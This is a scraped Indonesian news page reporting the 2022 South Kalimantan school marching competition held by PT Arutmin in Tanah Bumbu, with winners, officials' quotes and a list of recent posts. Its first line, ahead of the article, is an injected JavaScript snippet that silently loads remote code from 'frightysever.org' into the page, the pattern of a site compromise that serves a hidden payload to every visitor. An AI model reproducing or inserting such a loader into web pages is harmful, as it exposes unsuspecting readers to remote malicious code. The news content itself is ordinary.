(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Tim SMAN 1 Gambut dan SMPN 1 Simpang Empat Juara LKBB Arutmin Berbaris 2022


KANALKALIMANTAN.COM, BATULICIN – PT Arutmin Indonesia Tambang Batulicin bersama Dinas Kebudayaan Kepemudaan Olahraga dan Pariwisata (Disbudporpar) Kabupaten Tanah Bumbu menggelar Lomba Baris Berbaris (LKBB) tingkat Provinsi Kalimantan Selatan tahun 2022.

Aksi baris berbaris ditampilkan peserta menyita perhatian para penonton dan setiap saat memberikan tepuk tangan kepada peserta grand final Lomba Baris Berbaris di halaman kantor Arutmin Indonesia Site Batulicin, Sabtu (19/11/2022) siang.

Tampil sebagai juara di tingkat SLTA yaitu dari Tim A SMAN 1 Gambut Kabupaten Banjar, dan tingkat SLTP dari SMPN 1 Simpang Empat Tanah Bumbu.

Keterampilan para juara ini juga diakui keren dan sesuai pada aturan baris berbaris oleh tim penilaian yang bersertifikat tingkat Provinsi Kalsel.

 

Baca juga  : Ketua Kwarcab Banjar Nurgita Tiyas Pimpin Peringatan Hari Pramuka ke-61

Mereka yang juara dianggap layak mendapatkan predikat juara. Setelah menampilkan formasi baris berbarisnya.

Iwan Sugiarto Kusnadi, Manager PT Arutmin Indonesia Tambang Batulicin mengatakan pelaksanaan Arutmin Berbaris ini dilaksanakan sebagai rangkaian peringatan Hari Pahlawan dan Hari Ulang Tahun ke-42 Arutmin Indonesia.

Lomba keterampilan baris berbaris ini untuk pertama kali dilaksanakan tingkat Kalsel karena sejak 2018, hanya dilaksanakan di tingkat Kabupaten, bahkan sempat ditiadakan lantaran terjadi pandemi Covid-19, sempat dilanjutkan di 2021 secara online dan offline.

”Tahun ini, kita bisa laksanakan lagi ke tingkat Provinsi Kalsel dan diikuti sebanyak 64 peserta, kemudian diseleksi hingga akhirnya didapati finalis sebanyak 6 tim untuk SLTP dan SLTA,” katanya.

Baca juga  : Pelatihan Produk Turunan Berbahan Tenun Pagatan

”Kita ketahui dari baris berbaris ini, banyak manfaat yang bisa kita ambil mulai dari kedisplinan, kerjasama kekompakan, kreatifitas dan tertibnya bisa didapatkan,” ujarnya.

Sementara itu, Sekretaris Dinas Pemuda Olahraga dan Pariwisata Tanah Bumbu, Abdul Zabir, mengapresiasi kegiatan yang digelar Arutmin untuk para pelajar yang ada di Kalimantan Selatan.

”Kegiatan ini sangat positif bagi para pelajar kita dan ini harus terus ditingkatkan dan kita dukung ke tingkat nasional,” ucapnya.

Para peserta juara 1 tingkat SLTA mendapat hadiah Rp 5 juta dan juara 1 tingkat SLTP Rp 4 juta. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Desy Arfianty

Recent Posts

Pemkab Banjar Peringati Harkitnas dan HUT ke-75 Proklamasi Gubernur Tentara ALRI Divisi IV Pertahanan Kalimantan

KANALKALIMANTAN.COM, MARTAPURA - Halaman Kantor Bupati Banjar menjadi lokasi dilaksanakannya peringatan ke-116 Hari Kebangkitan Nasional… Read More

24 menit ago

Dirut PLN Tinjau Posko Utama Kelistrikan KTT WWF, Pastikan Sistem Kelistrikan di Bali Andal

KANALKALIMANTAN.COM, DENPASAR - Direktur Utama PT PLN (Persero) Darmawan Prasodjo meninjau langsung Posko Utama Kelistrikan… Read More

59 menit ago

Pj Bupati Erlin Hardi Hadiri Peluncuran Tahapan Pemilihan Bupati dan Wakil Bupati Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kabupaten Kapuas, Erlin Hardi menghadiri acara peluncuran tahapan… Read More

2 jam ago

Ini Penyebab Utama Crossing Drainase di Karang Anyar 1 Sering Berlubang

KANALKALIMANTAN.COM, BANJARBARU - Penyebab jalan berlubang yang kerap muncul di Jalan Karang Anyar 1 Kelurahan… Read More

5 jam ago

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

18 jam ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

19 jam ago

This website uses cookies.